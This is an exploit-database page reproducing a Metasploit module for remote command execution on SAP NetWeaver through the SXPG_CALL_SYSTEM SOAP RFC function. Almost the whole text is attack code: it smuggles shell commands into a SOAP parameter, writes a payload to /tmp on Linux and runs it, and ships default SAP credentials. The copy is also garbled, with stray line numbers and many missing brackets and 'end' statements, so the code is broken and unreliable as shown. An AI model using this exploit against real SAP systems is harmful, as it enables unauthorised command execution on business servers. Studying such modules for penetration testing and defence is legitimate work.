SAP SOAP RFC – SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)

Exploit Database
99 阅读

作者： Metasploit

日期： 2013-05-14
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/25445/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

# This module is based on, inspired by, or is a port of a plugin available in

# the Onapsis Bizploit Opensource ERP Penetration Testing framework -

# http://www.onapsis.com/research-free-solutions.php.

# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts

# in producing the Metasploit modules and was happy to share his knowledge and

# experience - a very cool guy.

# The following guys from ERP-SCAN deserve credit for their contributions -

# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and

# Dmitry Evdokimov.

# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis

# who have Beta tested the modules and provided excellent feedback. Some people

# just seem to enjoy hacking SAP :)

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::CmdStagerVBS

include Msf::Exploit::EXE

include Msf::Exploit::Remote::HttpClient

def initialize

super(

'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',

'Description' => %q{

This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP

RFC Service, to execute remote commands. This module needs SAP credentials with

privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested

successfully on Windows 2008 64 bits and Linux 64 bits platforms.

'References' =>

[

[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]

'DisclosureDate' => 'Mar 26 2013',

'Platform' => ['win', 'unix'],

'Targets' => [

[ 'Linux',

{

'Arch' => ARCH_CMD,

'Platform' => 'unix'

#'Payload'=>

#'DisableNops' => true,

#'Space' => 232,

#'Compat'=>

#'PayloadType' => 'cmd',

#'RequiredCmd' => 'perl ruby',

}

[ 'Windows x64',

{

'Arch' => ARCH_X86_64,

'Platform' => 'win'

}

]

'DefaultTarget' => 0,

'Privileged' => false,

'Author' =>

[

'nmonkee'

'License' => MSF_LICENSE

)

register_options(

[

Opt::RPORT(8000),

OptString.new('CLIENT', [true, 'SAP Client', '001']),

OptString.new('USERNAME', [true, 'Username', 'SAP*']),

OptString.new('PASSWORD', [true, 'Password', '06071992'])

], self.class)

register_advanced_options(

[

OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),

], self.class)

end

def send_soap_request(data)

res = send_request_cgi({

'uri' => '/sap/bc/soap/rfc',

'method' => 'POST',

'data' => data,

'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),

'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],

'ctype' => 'text/xml; charset=UTF-8',

'headers' => {

'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

'vars_get' => {

'sap-client' => datastore['CLIENT'],

'sap-language' => 'EN'

}

})

return res

end

def build_soap_request(command, sap_command, sap_os)

data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"

data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"

data << "<env:Body>"

data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"

data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"

data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"

data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"

data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"

data << "</n1:SXPG_CALL_SYSTEM>"

data << "</env:Body>"

data << "</env:Envelope>"

return data

end

def check

data = rand_text_alphanumeric(4 + rand(4))

res = send_soap_request(data)

if res and res.code == 500 and res.body =~ /faultstring/

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

end

def exploit

if target.name =~ /Windows/

linemax = datastore['PAYLOAD_SPLIT']

vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250

print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")

execute_cmdstager({ :delay => 0.35, :linemax => linemax })

elsif target.name =~ /Linux/

file = rand_text_alphanumeric(5)

stage_one = create_unix_payload(1,file)

print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")

res = send_soap_request(stage_one)

if res and res.code == 200 and res.body =~ /External program terminated/

print_good("#{rhost}:#{rport} - Payload dump was successful")

else

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")

end

stage_two = create_unix_payload(2,file)

print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")

send_soap_request(stage_two)

end

def create_unix_payload(stage, file)

command = ""

if target.name =~ /Linux/

if stage == 1

my_payload = payload.encoded.gsub(" ","\t")

my_payload.gsub!("&","&")

my_payload.gsub!("<","<")

command = "-o /tmp/" + file + " -n pwnie" + "\n!"

command << my_payload

command << "\n"

elsif stage == 2

command = "-ic /tmp/" + file

end

return build_soap_request(command.to_s, "DBMCLI", "ANYOS")

end

def execute_command(cmd, opts)

command = cmd.gsub(/&/, "&")

command.gsub!(/%TEMP%\\/, "")

data = build_soap_request("&#{command}", "LIST_DB2DUMP", "ANYOS")

begin

res = send_soap_request(data)

if res and res.code == 200

return

else

if res and res.body =~ /faultstring/

error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})

0.upto(error.length-1) do |i|

vprint_error("#{rhost}:#{rport} - Error #{error[i]}")

end

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")

end

rescue ::Rex::ConnectionError

fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")

end